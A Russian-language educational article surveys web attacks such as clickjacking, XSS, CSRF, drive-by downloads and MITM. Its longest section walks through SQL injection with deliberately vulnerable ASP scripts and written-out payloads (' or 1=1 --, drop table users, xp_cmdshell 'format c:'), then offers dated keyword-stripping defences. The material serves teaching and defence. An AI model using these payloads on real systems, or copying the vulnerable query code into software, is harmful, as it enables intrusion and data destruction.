Довольно обширный комментарий на тему можно найти по адресу http://raz0r.name/news/opublikovany-podrobnosti-ataki-clickjacking/. "Реализация атаки состоит в следующем: некий сайт A имеет в себе IFRAME, адресом которого является сайт B, к которому пользователь имеет доступ на основе авторизационных данных Cookie. Злонамеренный сайт A перекрывает страницу с сайта B таким образом, чтобы оставить видимым конкретный элемент, например, кнопку “Удалить аккаунт”, “Добавить друга” и т.д. Сайт A может иметь такой интерфейс, который позволял бы рассматривать элемент с сайта B, как часть сайта A, побуждая пользователя нажать на него. Тем самым пользователь подвергается опасности совершения абсолютно непредполагаемых им действий, которые выгодны злоумышленнику. Добиться такого “перекрывания” интерфейса другого сайта можно с помощью метода CSS Overlay. Конечно все это выглядит мягко говоря не совсем практично, но возможности Clickjacking не ограничивается лишь подобным примером атаки. Кроме того, возможна (точнее была возможна в связи с выходом патча) атака, при которой пользователь, нажимая на определенные области экрана, в дружелюбной игре, может поменять настройки Flash таким образом, что его компьютер превратился бы в настоящую станцию слежения с помощью веб-камеры или микрофона (разумеется, если таковые устройства подключены к компьютеру). Именно этот способ был раскрыт независимо от Гроссмана и Хансена, в следствие чего последний был вынужден снять завесу тайны с Clickjacking в своем блоге лишь недавно." По этому же адресу приведены и фрагменты программ, реализующих подобные атаки.

Атака Clickjacking (кража кликов), известная также как UI Redressing (фальсификация идентичности пользователя), возможна не из-за ошибки в программе, но благодаря выполнению неожиданных действий WEB-страницей, кажущейся безобидной.

Страница с clickjacking вынуждает пользователя выполнить нежелательные действия, кликая мышкой на замаскированной ссылке. На такой странице-ловушке атакер помещает набор фальшивых кнопок, затем загружает поверх предыдущей другую страницу в виде прозрачного слоя. Пользователь думает, что он кликает на видимой кнопке, в то время как действия выполняются на скрытой странице. В результате пользователь выполняет действия, которые он совершенно и не думал делать. Что важно, практически невозможно отследить такие операции, так как пользователь был аутентифицирован совершенно на другой странице. Следует заметить, что для реализации атаки нужна технология iframe.

В последнее время появилась разновидность clickjecking - likejecking. Эта разновидность атаки используется в социальной сети Facebook. Атака сопряжена со злонамеренным использованием кнопки "Like". Атака впервые описана Corey Ballou в статье 'How to "Like" Anything on the Web (Safely)'. Смотри Cohen, Richard (05/31/2010). "Facebook Work - "Likejacking"". Sophos, а также http://www.sophos.com/blogs/sophoslabs/?p=9783. Retrieved 2010-06-05.

Например, пользователь мог играть в игру, где он должен был нажимать на некоторую кнопку, но в скрытом виде поверх игры была загружена другая страница, например, web-mail. Почтовая программа загружается в скрытую iframe, а кнопки игры по месту совпадают с кнопками почтового сервиса. Пользователь при этом, нажав на одну из кнопок игры, может, например, стереть все содержимое своего почтового ящика.

Простым средством противодействия является использование JavaScript, блокирующего использование HTML-фреймов. Но в последнее время разрабатываются версии Clickjacking, которые не требует фреймов. Впрочем, утверждается, что IE8 детектирует сайты, которые могут представлять подобную угрозу.

BHO

BHO (Browser Helper Object) - небольшие программы, которые мониторируют посещаемые WEB-страницы, включают рекламу или перадресуют запросы, производят автоматически обновление browser или экспортируют данные. Этот тип программ можно отнести к spyware.

На текущий момент число машин, содержащих в себе один или более объектов типа spyware, удваивается каждый год.

Поведение различных видов PUP показано на рис. 10. (По материалам McAffe System (октябрь 2005) .

Рис. 10. Поведение различных PUP
(BHO - Browser Helper Object)

Для иллюстрации актуальности проблемы приведу следующие данные. Представители TJX Companies Inc. признали в среду (28 марта 2007), что данные по крайней мере о 45.7 миллионов кредитных и дебитных карт были украдены за последние 18 месяцев хакерами, которым удалось проникнуть в их сеть. Это крупнейшее похищение данных за всю историю.

По данным компании IDC spyware занимает 4-ю позицию по вредоносности. На первом месте по нанесенному вреду находится программные уязвимости (78000 пострадавших машин), наименьший ущерб из числа проанализированных угроз получен от adware (Save Now - 14000 пострадавших машин). По данным ФБР spyware наносит ущерб бизнесу в США на уровне 67 млрд. долларов в год (2007 год).

Если раньше борьба за безопасность разворачивалась на уровнях L3-L4, то теперь она переместилась на прикладной уровень и новые Firewall должны это учитывать.

Старые Firewall в новых условиях уже не могут обеспечить требуемый уровень безопасности. Адекватные разработки начали появляться на рынке. Новый подход получил название Negative Security Model. В этом подходе вредоносный трафик блокируется, если окажется идентифицирован. Идентификация при этом происходит на уровне поля данных, а не только заголовков пакетов. Но по своей природе данная модель противодействия атакам реактивна и для того, чтобы она могла работать, нужно составить описание сигнатуры атаки.

Среди угроз Web 2.0 можно назвать:

• Вредоносные программы, сопряженные с Web.
• RSS обновления реального времени с вредоносными JavaScript внутри.
• XSS (Cross Site Scripting), например, червь MySpace. В некоторых случаях эта атака позволяет обойти систему контроля доступа.
• CSRF (Cross Site Request Forgery) - кража данных в среде Java, например, Gmail. Смотри http://www.veracode.com/security/csrf.
• Обход фильтров XSS.
• Экспоненциальные атаки XSS - без ограничения на число атакуемых WEB-сайтов.
• Фальсификация заголовков запросов с использованием FLASH.
• Черные ходы медийных файлов (JavaScript).

Если эти меры окажутся недостаточными и оператор машины-жертвы не попадет в расставленные ловушки, хакер предпринимает атаку непосредственно на машину-жертвы. Обычно атака предпринимается с другой машины, взломанной ранее в результате неспецифической атаки. Причем хакер и жертва могут быть разделены целой цепочкой таких взломанных машин, что делает вероятность детектирования исходного адреса хакера ничтожно малой. Успех хакера при такой атаке практически гарантирован, а сама процедура взлома занимает от 30 до 200 секунд. Хакер может установить на машине жертвы rootkit, скопировать интересующие его файлы и выполнить любую другую вредоносную работу. Им могут быть отредактированы журнальные файлы машины-жертвы, что сделает трудным даже установление самого факта взлома. Смотри Tageted cyber attacks (GFI Security Ebook).

Смотри Top 10 Security Trends for 2008.

• Хакеры активно используют атаки типа SQL и iframe injection для заражения популярных WEB-сайтов вредоносными кодами.
• Web-сайты будут оставаться уязвимыми до тех пор, пока обучение безопасным методам работы и тестирование не станет обязательным для всех разработчиков WEB приложений, хакеры продолжают разрабатывать программы для преодоления Firewall и проникновения в HTTP-приложения и вторжения в SSL коммуникации.
• Объектами для атак станет передачи видео в реальном масштабе времени. Cisco откорректировала свой протокол VOIP, чтобы убрать уязвимости, но дырки сохранились в видео форматах.
• Черный рынок персональных данных при расценках (около $14/имя) делает крайне привлекательными объектами лэптопы (машина, содержащая данные о 10000 сотрудниках может стоить около $140,000.
• В феврале продавцы электронных средств предупредили клиентов, что многие средства для просмотра цифровых фотографий, подключаемые к машинам через USB-порт небезопасны (могут быть заражены, например, тороянским конем Mocmex).
• Botnet ответственны за большую часть SPAM (20%) и за большую долю случаев заражения вредоносными кодами. Появились более вредоносные версии botnet (например, MayDay). К 2008 году число машин в botnet достигнет 10 миллионов. Предсказывается, что это число может составить 150 миллионов (смотри "FireEye: Taking the Botnet Threat Seriously" - компания EMA). Для формирования botnet все чаще используются методы социальной инженерии и фишинга. В 2005 году была арестована группа хакеров из Голландии, которые создали botnet, число машин в которой достигало 1,5 миллиона.
• Facebook и MySpace продолжают предлагать пользователям впечатляющие клипы, но эти сайты с мириадом приложений уязвимы для атак. Например, эксперты по безопасности идентифицируют загрузчик изображений Facebook, как существенную угрозу безопасности для конечных пользователей.
• В ответ на кражи индивидуальных данных компании для идентификации людей начинают использовать специальные коды идентификации вместо номеров социального страхования (стандарт Open ID), что минимизирует кражи индивидуальных данных.

В настоящее время выделяются пять основных угроз для VoIP (телефония, Skype):

1. Наиболее серьезной угрозой для предприятий, использующих каналы SIP и UC для мобильных коммуникаций, является DoS (Denial of Service) и DDoS-атаки сетей VoIP.
2. Объектами атак становятся HTTP или иные информационные службы, реализующие VoIP для конечных пользователей.
3. Хакерское сообщество, имеющее опыт в использовании уязвимостей в других продуктах Microsoft, может обратить внимание на Microsoft OCS (Office Communication Server), используя преимущество своего UC-доступа к общедоступной системе IM, почте и спискам общения, чтобы сформировать botnet и начать атаки.
4. Хакеры могут установить больше IP PBX для vishing/phishing. Из-за простоты и легкости заработка атаки следует ожидать увеличения vishing-атак на банки. Этому способствует относительная безопасность таких атак.
5. Следует ожидать увеличения VoIP-атак против сервис-провайдеров с помощью доступных анонимных SIM-карт. С помощью UMA (Unlicensed Mobile Access), достаточно широко используемых в последнее время, клиенты получают прямой IP-доступ к сети мобильной связи, что упрощает фальсификация идентификационных параметров и создание нелегальных акаунтов, позволяющих реализовать различные атаки.

Вредоносные программы, сопряженные с Web

Уязвимости, сопряженные с WEB, остаются мертвой зоной многих программ безопасности. Многие приложения не способны анализировать данные, полученные в результате посещения WEB-сайта. Обычно хакеры с помощью JavaScript добавляет код к WEB-странице. Когда ничего неподозревающий пользователь заходит на зараженный сайт, браузером запускается JavaScript, который загружает вредоносный код в машину пользователя. Считается, что 450000 URL указывают на вредоносные сайты. Ниже приведены примеры зараженных WEB-сайтов.

Примеры вредоносных HTML и JavaScript-кодов

Слева (А) представлена вредоносная ссылка из iframe, которая при просмотре загружает вредоносный код. Справа (В) показан вариант JavaScript, который выполняет ту же функцию, что и "A", но его более трудно распознать, что создает трудности для сканеров вредоносных кодов на WEB-сайтах. Смотри Not all malware detection is created equal. Ниже предстален исходный текст скрипта для атаки Gumblar (A), в секции (B) представлен текст обработанный вручную, что позволяет понять его назначение - загрузка вредоносного кода с удаленного сайта.

Примеры вредоносных HTML и JavaScript-кодов

Большинство браузеров выявляют наличие JavaScript и запрашивают у пользователя разрешения для их запуска. Новейшие версии, например, фирмы Sophos, умеют также выявлять вредоносные и потенциально опасные скрипты. Проблема в том, что в локальной сети обычно имеется масса пользователей, которые беззаботно загружают самые разные WEB-приложения, нисколько незаботясь о безопасности своей машины и сети в целом. Хотелось бы посмотреть на сетевого администратора, который бы решился заблокировать такую возможность...

Еще несколько лет назад мир был разделен границами стран, городов и компаний. В качестве пограничных застав использовались Firewall и шлюзы и никакой посторонний трафик не мог войти и выйти, не имея специального разрешения. Сегодня мир стал плоским, а границы стали размыты и уязвимы. Новые приложения, социальные сети (Twitter, Facebook и пр.) и блоги стали новыми источниками уязвимостей.

Cross-site scripting (XSS, иногда используется и сокращение CSS) представляет собой уязвимость web-приложений, которая позволяет внедрение вредоносного кода web-пользователями (хакерами) в WEB-страницы, просматриваемые другими пользователями (1996 год). Примеры таких кодов включают в себя HTML-код и скрипт для стороны клиента. Практические реализации программ, использующих эту уязвимость могут использоваться хакерами, например, чтобы обойти систему управления доступом. Уязвимости этого типа используются при фишинг-атаках в частности Web 2.0 объектов. Примерами атак этой уязвимости являются червь MySpace XSS и XSS Yahoo. К данной разновидности следует отнести многие уязвимости WEB-сайта YouTube Google. XSS реализуется, когда приложение предполагает определенный тип ввода, а вместо этого хакрер посылает код другого вида, который приложение вынуждено обрабатывать. При этом часто крадется cookie пользователя.

XSS-уязвимости можно разделить на два типа: рефлективные и с запоминанием. В рефлективных не производится запоминания входных данных, за то производится немедленное их отображение. Это могут быть поисковые страницы, где отображаются параметры запроса поиска, страницы уведомления об ошибках, когда отображается URL или имя запрошенной страницы. При этом типе уязвимости вредоносный скрипт поступает к жертве в виде указания на уязвимое WEB-приложение через посредство, например, почты. Скрипт при этом встраивается непосредственно в URL. К уязвимостям с запоминанием относятся все случаи, в которых вредоносный ввод запоминается где-то в WEB-приложении, ожидая, когда пользователь исполнит скрипт. Примеры XSS часто включают в себя сайты, которые допускают WEB-приложениям пользователя передать сообщения или комментарии, позднее читаемые другими пользователями. Схема такой атаки показана на рисунке ниже. Строки кодов, поясняющие методы XSS-атак, можно найти в ссылке, размещенной в начале данной статьи. Там же описаны методы противодействия этому виду атак.

Схема XSS-атаки

Практический пример ("A Pragmatic, Policy-Driven Framework for Protection Against Cross-Site Scripting by Joseph Gugeja and Geraint Price)

Ниже на рисунке показаны схемы кражи куки пользователя.

Схемы кражи куки при XSS-атаке

1. Атакер помещает вредоносный код на взломанны WEB-сайт
2. Пользователь посещает это WEB-сайт и предоставляет свое куки
3. WEB-сайт позволяет пользователю авторизоваться
4. Вредоносный код посылает куки пользователя атакеру

Материалы этой статьи базируются на публикации Митчела Харпера (Mitchel Harper).

Базы данных являются основой многих современных Web приложений, а также файловых систем некоторых ОС. В них хранятся параметры доступа и аутентификации, финансовая информация. Базы данных служат для сохранения предпочтений, счетов, платежей, инвентаризационной информации и многого другого. Базы данных в сочетании с различными скриптами делают Web-сайты комфортными для клиентов.

Но именно атаки типа SQL injection превращают сайты, использующие базы данных, в уязвимые объекты. В 2008 году этот вид атаки стал самым массовым. Смотри www.veracode.com/security/sql-injection.

Что представляет собой атака SQL Injection?

SQL является базовым языком запросов современных баз данных. Он имеет много модификаций, большинство из которых базируются на стандарте SQL-92 ANSI. SQL-запрос содержит в себе одну или более SQL-команду, такую как SELECT, UPDATE или INSERT. Схема атаки SQL-injection показана на рисунке ниже.

Схема атаки SQL-injection (Microsoft Security Intelligence Report. Volume 8. July through December 2009)

Для запросов SELECT типичным является возврат некоторых данных, например:

SELECT * FROM Users WHERE userName = 'justin';

В приведенном SQL запросе фраза WHERE username = 'justin', означает, что нужны строки из таблицы Users, для которых поле userName содержит строку Justin.

Именно такие запросы позволяют реализовать атаки типа SQL injection. Из названия атаки следует, что злоумышленник вкладывает нечто в SQL запрос. Вложение некоторых неожиданных кодов позволяет манипулировать базой данных.

Одним из популярных способов контроля доступа к Web-сайту является снабжение его HTML формой, куда пользователь вводит свое имя и пароль. Примером реализации такой формы может быть следующий HTML код:

 
Username:  
Password:  
 

Когда содержимое формы передано серверу (выполнена операция submit), содержимое полей username и password передается, например скрипту login.asp, и становится доступным скрипту в рамках набора Request.Form. Простейшим способом проверки прав доступа конкретного пользователя является посылка соответствующего SQL запроса. Скрипт login.asp может иметь вид:

<% dim userName, password, query 
dim conn, rS 
userName = Request.Form("userName") 
password = Request.Form("password") 
set conn = server.createObject("ADODB.Connection") 
set rs = server.createObject("ADODB.Recordset") 
query = "select count(*) from users where userName='" &  
userName & "' and userPass='" & password & "'" 
conn.Open "Provider=SQLOLEDB; Data Source=(local);  
Initial Catalog=myDB; User Id=sa; Password=" 
rs.activeConnection = conn 
rs.open query 
if not rs.eof then 
response.write "Logged In" 
else 
response.write "Bad Credentials" 
end if %>

В выше представленном примере пользователь получит уведомление "Logged In", если его параметры содержатся в базе данных, либо "Bad Credentials", если это не так.

Создадим базу данных пользователей с несколькими записями:

create database myDB 
go 
use myDB 
go 
create table users 
( userId int identity(1,1) not null, 
userName varchar(50) not null, 
userPass varchar(20) not null ) 
insert into users(userName, userPass) values('john', 'doe') 
insert into users(userName, userPass) values('admin', 'wwz04ff') 
insert into users(userName, userPass) values('fsmith', 'mypassword')

Таким образом, если мы введем имя пользователя john и пароль doe, мы получим отклик "Logged In". Запрос при этом может иметь вид:

select count(*) from users where userName='john' and userPass='doe'

Но если ввести имя john и пароль ' or 1=1 --

Результирующий запрос приобретет форму:

select count(*) from users where userName='john' and userPass=''  
or 1=1 --'

Такой запрос проверяет любого пользователя с полем имени john. Вместо проверки пароля, запрос ищет пустой пароль или выполнение условия 1=1. Это означает, что, если поле пароля пусто или 1 равна 1 (что всегда верно), тогда из таблицы пользователя будет выбрана соответствующая строка. Обратите внимание, что последняя кавычка закомментирована строчными разграничителем комментария (--). Это блокирует посылку ASP сообщения об ошибки из-за отсутствия закрывающей кавычки.

Скрипт login.asp, представленный выше, вернет одну строку и сообщение "Logged In". Можно проделать тоже самое с полем имени пользователя:

Username: ' or 1=1 --- 
Password: [Empty]

Это приведет к формированию запроса:

select count(*) from users where userName='' or 1=1 --' and userPass=''

Этот запрос вернет число всех строк в таблице пользователей. Это является примером атаки SQL injection: добавление кода, который манипулирует содержанием запроса с целью получения нужного хакеру результата.

Другой популярный способ сверки имени пользователя по login-таблице и получения правильного имени из базы данных представлен ниже:

query = "select userName from users where userName='" &  
userName & "' and userPass='" & password & "'" 
conn.Open "Provider=SQLOLEDB; Data Source=(local);  
Initial Catalog=myDB; User Id=sa; Password=" 
rs.activeConnection = conn 
rs.open query 
if not rs.eof then 
response.write "Logged In As " & rs.fields(0).value 
else 
response.write "Bad Credentials" 
end if

Итак, если мы введем имя пользователя john и пароль doe, то получим:

Logged In As john

Однако, если использовать в запросе другие параметры:

Username: ' or 1=1 --- 
Password: [Anything]

Далее мы будем идентифицированы в качестве John, так как строка с именем John присутствует первой в списке:

insert into users(userName, userPass) values('john', 'doe') 
insert into users(userName, userPass) values('admin', 'wwz04ff') 
insert into users(userName, userPass) values('fsmith', 'mypassword')

Еще один сходный пример

SQL сервер, наряду с другими базами данных, разделяет запросы с помощью точки с запятой. Использование точки с запятой позволяет передать несколько запросов в одном блоке и исполнить их одновременно, например, запрос:

select 1; select 1+2; select 1+3; 

...должен вернуть три набора записей. Первая будет содержать 1, вторая - 3, а третья - 4, и т.д.. Таким образом, если вы вошли в систему со следующими параметрами доступа:

Username: ' or 1=1; drop table users; -- 
Password: [Anything] 

Тогда запрос выполнит две вещи. Во-первых, будет выбрано поле userName для всех строк таблицы пользователей. Во-вторых, он сотрет таблицу пользователей, так что когда мы попытаемся войти в систему в следующий раз, то получим следующий сигнал ошибки:

Microsoft OLE DB Provider for SQL Server (0x80040E37) 
Invalid object name 'users'. 
/login.asp, line 16

Пример 2

Но помимо проблем описанных выше имеются и другие способы вторжения. Вам, вероятно, много раз приходилось заходить на сайты, которые торгуют автомобильными запасными частями или компьютерной техникой, например:

www.mysite.com/products.asp?productId=2

Очевидно, что 2 является идентификатором конкретного объекта, и многие сайты формируют запросы, используя идентификатор productId в качестве переменной запроса, например:

Select prodName from products where id = 2

Прежде чем мы продолжим, предположим, что у нас имеется следующая таблица на нашем SQL-сервере:

create table products 
( id int identity(1,1) not null, 
prodName varchar(50) not null, ) 
insert into products(prodName) values('Pink Hoola Hoop') 
insert into products(prodName) values('Green Soccer Ball') 
insert into products(prodName) values('Orange Rocking Chair')

Предположим также, что мы создаем следующий ASP-скрипт, и вызываем products.asp:

<% 
dim prodId 
prodId = Request.QueryString("productId") 
set conn = server.createObject("ADODB.Connection") 
set rs = server.createObject("ADODB.Recordset") 
query = "select prodName from products where id = " & prodId 
conn.Open "Provider=SQLOLEDB; Data Source=(local);  
Initial Catalog=myDB; User Id=sa; Password=" 
rs.activeConnection = conn 
rs.open query 
if not rs.eof then 
response.write "Got product " & rs.fields("prodName").value 
else 
response.write "No product found" 
end if 
%>

Итак, если заходим на products.asp со следующим URL:

http://localhost/products.asp?productId=1

... на нашем броузере мы увидим следующую строку текста:

Got product Pink Hoola Hoop

Заметим, что в данном случае product.asp присылает поле из набора записей, основываясь на имени этого поля:

response.write "Got product " & rs.fields("prodName").value

Это может показаться вполне безопасным, хотя таковым и не является, так как вы можете достаточно произвольно манипулировать базой данных. Заметим, что условие WHERE запроса использует числовой параметр:

query = "select prodName from products where id = " & prodId

Для того чтобы страница products.asp page функционировала корректно, нужно лишь передать числовой идентификатор продукта в качестве параметра запроса. Вообще говоря, это не слишком серьезная проблема. Рассмотрим обработку следующего URL products.asp:

http://localhost/products.asp?productId=0%20or%201=1

Примерно %20 URL кодируют символ пробела, так что в действительности URL выглядит как:

http://localhost/products.asp?productId=0 or 1=1

Когда обработка производится products.asp, запрос будет иметь вид:

select prodName from products where id = 0 or 1=1

Зная правила URL-кодирования, мы можем легко извлечь содержимое поля названия товарара из таблицы товаров:

http://localhost/products.asp?productId=0%20having%201=1

это вызовет следующее сообщение об ошибке в броузере:

Microsoft OLE DB Provider for SQL Server (0x80040E14) 
Column 'products.prodName' is invalid in the select  
list because it is not contained in an aggregate  
function and there is no GROUP BY clause. 
/products.asp, line 13

Теперь, мы можем взять содержимое поля имени товара (products.prodName) и осуществить следующий запрос:

http://localhost/products.asp?productId=0;insert%20into%20products 
(prodName)%20values(left(@@version,50))

Этот запрос не использует кодирования пробелов:

http://localhost/products.asp?productId=0;insert into  
products(prodName) values(left(@@version,50))

Вообще такой запрос пришлет оклик "No product found" (товар не найден), однако он выполнит операцию INSERT для таблицы товаров, добавив первые 50 символов переменной @@version SQL-сервера (эта переменная содержит данные о версии SQL-сервера и т.д.) в качестве новой записи в таблицу товаров.

В реальной ситуации вы можете модифицировать таблицу товаров произвольным образом, используя и другие поля таблицы.

Получение значения версии теперь становится простым делом, достаточно обратиться к products.asp со значение последнего ввода в таблицу товаров:

http://localhost/products.asp?productId=(select%20max(id) 
%20from%20products)

Этот запрос берет ID последней введенной строки, используя функцию MAX SQL-сервера. В результате вы получите выдачу:

Got product Microsoft SQL Server 2000 - 8.00.534 (Intel X86)

Предотвращение атак SQL Injection

Если вы тщательно разрабатываете скрипты и приложения, атаки SQL injection будут мало вероятны. Существует много вещей, которые разработчики могут сделать, чтобы уменьшить угрозу атаки сайта.

Ограничить доступ пользователей

Системный аккоунт по-умолчанию для SQL сервера 2000 не должен использоваться. Не следует заводить специальных аккоунтов для специальных целей.

Например, если вы работаете с базой данных, где разрешен доступ пользователей к таблицам заказа товара, тогда вам следует сформировать пользователя с именем webUser_public, который имеет права SELECT для таблицы товаров, и права INSERT для таблицы заказов.

Если вы не используете расширенные процедуры, имеете неиспользуемые триггеры или функции, определенные пользователем и т.д., удалите их или перенесите на изолированный сервер. Большинство наиболее разрушительных атак SQL injection пытаются использовать несколько расширенных, запомненных процедур, таких как xp_cmdshell и xp_grantlogin, таким образом, удаляя их, вы теоретически блокируете атаку до ее попытки.

Escape Quotes

Как мы видели из примеров, обсужденных, большинство атак инжекции требуют, чтобы пользователь завершал выражение одиночной кавычкой. Используя простую функцию замещения и преобразуя одиночные кавычки в двойные, вы заметно уменьшите вероятность успешной атаки.

Используя ASP, очень просто сформировать общую функцию подмены, которая будет иметь следующий вид:

<% 
function stripQuotes(strWords) 
stripQuotes = replace(strWords, "'", "''") 
end function 
%>

Теперь, если вы используете функцию stripQuotes в сочетании с нашим первым вариантом запроса, тогда последует:

select count(*) from users where userName='john' and  
userPass='' or 1=1 --'

select count(*) from users where userName='john'' and  
userPass=''' or 1=1 --'

Это сделает атаки injection практически невозможными, так как ограничение WHERE теперь требует одновременной корректности полей userName и userPass.

Удалить потенциально опасные символы и символьные последовательности

Как было показано выше, определенные символы и последовательности символов, такие как ;, --, select, insert и xp_, могут использоваться для реализации атаки SQL injection. Удаляя эти символы и сочетания символов из входного потока пользователя до формирования запроса, мы можем уменьшить шанс подобной атаки в будущем.

Как в случае с одиночной кавычкой для обработки всего этого нам нужна базовая функция:

<% 
function killChars(strWords) 
dim badChars 
dim newChars 
badChars = array("select", "drop", ";", "--", "insert",  
"delete", "xp_") 
newChars = strWords 
for i = 0 to uBound(badChars) 
newChars = replace(newChars, badChars(i), "") 
next 
killChars = newChars 
end function 
%>

Использование stripQuotes в сочетании с killChars существенно уменьшает шанс успеха любой атаки SQL. Так, если мы имеем запрос:

select prodName from products where id=1; xp_cmdshell 'format  
c: /q /yes '; drop database myDB; --

и реализуем его через stripQuotes и далее killChars, он завершится примерно следующим образом:

prodName from products where id=1 cmdshell ''format c:  
/q /yes '' database myDB

...что в принципе бесполезно, так как не возвращает никакой информации.

Ограничьте длину ввода для пользователя

Не разумно иметь текстовое поле формы, допускающее ввод 50 или более символов, если размер эталонной строки не превышает 10.

Если вы воспринимаете строку запроса для ID товара или в качестве функции фильтрации (проверки) входных данных, например, IsNumeric() для ASP. Так если величина не является числовой, генерируется ошибка либо пользователь переадресуется на другую страницу, где он сможет выбрать нужный ему товар.

Старайтесь переправлять вашу форму с привлечением метода POST, что не даст пользователям возможности отслеживать параметры формы, следующие в конце URL.

Атака SQL injection возможна и в случае MySQL, Oracle и любой другой базы данных. Смотри также An Anatomy of a Web Hack: SQL Injection Explained. Для обеспечения противодействия атакам SQL-injection нужно тщательно отлаживать скрипты, выполняющие обработку SQL-запросов, в особенности в части обработки параметров запроса.

Уязвимости CSRF часто путают с XCC. Однако CSRF не полагается на активные скрипты стороны клиента, вместо этого CSRF использует для выполнения нежелательных действий соединение клиента с вредоносным WEB-сайтом. Примером использования этой уязвимости можно назвать phpMyAdmin (CVE-2006-5116). В этом примере удаленный атакер выполняет неавторизованные действия, прикидываясь одним из пользователей и установив ссылку на специально созданный URL. Известны случаи реализации CSRF при работе с DSL-маршрутизатором. Смотри Cross-site request forgery.

В случае CSRF невинные на вид сайты генерируют запросы к различным другим сайтам, эти атаки используют уязвимости, например, в Twitter, позволяя владельцам сайтов получать данные о профайлах посетителей Twitter.

Если еще совсем недавно наиболее эффективным спостобом распространения вредоносных кодов была электронная почта, то начиная с 2002 года на лидирующие позиции вышла WEB-технология и IM. Смотри секцию раздела-обзора о тенденциях в сфере атак во второй половине 2009 г (лаб. Касперского. Ryan Naraine)..

Главным образом это связано с широким распространением атак типа "Drive-by Download". Схема такой атаки показана ниже на рисунке.

Схема атаки "Drive-by Download"

Занесение вредоносного кода происходит следующим образом. Пользователь заходит на легальный сайт, зараженный ранее. Оттуда он переадресуется по цепочке сайтов и попадает в конце концов на сервер, откуда производится загрузка вредоносного кода. В такой схеме достаточно трудно отследить инициатора вторжения, а количество зараженных машин определяется числом клиентов, заходящих на зараженные сайты. Чем популярнее и официальнее сайт, тем заражений больше. При этом могут атаковаться уязвимости браузера, необновленные plug-in, уязвимое управление ActiveX и т.д.

Общеизвестен факт стремительного роста атак типа phishing. Но в последнее время такие атаки становятся все более изощренными. Например, посылается сообщение одному из руководителей фирмы как бы от имени налогового ведомства (в США - IRS). Сообщение выглядит как жалоба наблюдателей BBB (Better Business Bureau). Предполагается, что собственно жалоба клиента лежит в приложении. Все это имеет логотипы соответствующих организаций и располагает к доверию. Менеджер, открыв приложение, убедится, что жалоба ничтожная и тут же о ней забывает, но при открытии приложения на его машине уже установлен троянский конь и цель хакера достигнута. Бывают аналогичные сообщения как бы из Федеральной торговой комиссии (FTC) c жалобой клиента на работу компании.

Загружаемый троянский конь может выкрасть из файлов менеджера критическую для компании информацию и переслать на машину-зомби. Таким образом, прямое отслеживание источника атаки невозможно, даже если она детектирована. Сценарии же подобных атак могут варьироваться в широких пределах. Могут предприниматься попытки переслать данные вполне добропорядочным фирмам, чтобы их скомпрометировать.

Мало-помалу сформировался список наиболее опасных атак (эффективных способов вторжения).

Наиболее эффективной может считаться многоуровневая защита:

• Использование анти-SPAM фильтра с репутационным компонентом.
• URL-фильтрация с включением отбора по репутации.
• Сканирование на предмет наличия вредоносных JavaScrip вставок в сообщение или приложение, а также в тексты откликов на WEB-запросы.
• Блокировка пересылки из серверов любых персональных данных.

Основные сетевые угрозы предприятию представлены на рис. 11 (см. A Guide to Delivering Dynamic Protection in an Evolving Threat Environment (IDC)). Из рисунка видно, что основную долю составляют троянские кони, вирусы, черви, spyware и SPAM. Эти данные относятся к 2006 году, но за 2007 год ситуация изменилась незначительно.

Рис. 11. Основные угрозы безопасности предприятия

На рис. 12 представлена оценка компанией Novell причин потери критических данных (смотри Novell ZENworks Endpoint Security Management: Total Control from a Single Console). Кражи laptop и компактных накопителей (thumb drive), а также другхе устройств памяти состаляют основную долю - 49%. Ситуация усложняется из-за того, что 53% компаний в случае утери или кражи носителя информации не могут (или не хотят) сказать какие данные утрачены.

Рис. 12. Соотношения причин потери критических данных

В публикации Protecting Against the New Wave of Malware (An Osterman Research White Paper - Sunbelt Software) представлен список наиблоее опасных сетевых угроз для 2008 года - рис. 13 .

Рис. 13. Доля различных видов атак для успешных вторжений (2008 год)

Человек посередине (Man-In-The-Middle = MITM)

Этот вид атаки используется для перехвата конфиденциальной информации, а также для подмены открытых ключей в системе двухключевой криптографии. Но данная схема атаки может быть применена в качестве составной части многих других схем атаки и вторжения (смотри, например, варианты атак протокола ТСР). Для реализации атаки MITM хакеру не обязательно нужно находиться на пути между объектами А и В. Он может создать фальсифицированный маршрутизатор и перенаправить информационный поток на свою машину. Если же не ставить целью конкретные объекты А и В, то задача многократно упрощается.

Если хакер умудрится вставить свою ЭВМ в разрыв канала, соединяющего субъектов А и В, у него появляется возможность перехватывать в том числе и шифрованные сообщения. Пусть субъект А сформировал пару ключей К_1А и К_2А (ключ с индексом 2 является секретным), аналогичную пару ключей сгенерировал субъект В (К_1В и К_2В). Хакер же тем временем подготовил две пары ключей (К_1ХА:К_2ХА и К_1ХВ:К_2ХВ). Когда субъект А пошлет открытый ключ К_1А субъекту В, хакер его подменит ключом К_1ХА. Аналогичную процедуру он проделает с ключом К_1В, посланным от В к А. Теперь сообщение А к В, зашифрованное с помощью ключа К_1ХА будет послано В. Хакер его перехватывает, дешифрует с помощью ключа К_2ХА, шифрует с помощью ключа К_1В и посылает В. Субъект В, получив послание, дешифрует его с помощью своего секретного ключа . Аналогичная процедура будет проведена и при посылки сообщения от В к А. В сущности единственным параметром который изменится существенным образом будет время доставки сообщения, так как это время будет включать дешифровку и повторную шифровку сообщения. Но при использовании быстродействующей ЭВМ и при работе с традиционной электронной почтой это может оказаться незаметным. Понятно, что между А и В появится дополнительный шаг (hop). Но и это может быть легко замаскировано под прокси сервер или Firewall.

После выяснения в 2008 году слабости алгоритма MD5 появилась возможность формирования фальшивых сертификатов, что существенно понижает безопасность сетевых систем.

Атака MitB (Man-in-the-Browser, Philipp Guhring 2005 год) представляет собой троянского коня, которым заражается WEB-браузер, и который может модифицировать страницы и содержимое транзакций. Причем все это делается невидимым образом для пользователя и приложения машины. Атака оказывается успешной даже при наличии SSL/PKI или многофакторной аутентификации. MitB использует продвинутые возможности браузера (такие как Browser helper Objects, расширения и пользовательские скрипты). Обычно он не обнаруживается антивирусными программами. Этот вид атаки особенно опасен для банковских операций. Минимизировать угрозу можно загружая ОС (Linux) с CD или флэш-памяти. Не рекомендуется иметь на машине почтовых приложений и вообще число приложений должно быть минимизировано. Смотри Michael Kassner, "Crimeware:Looking for solutions".

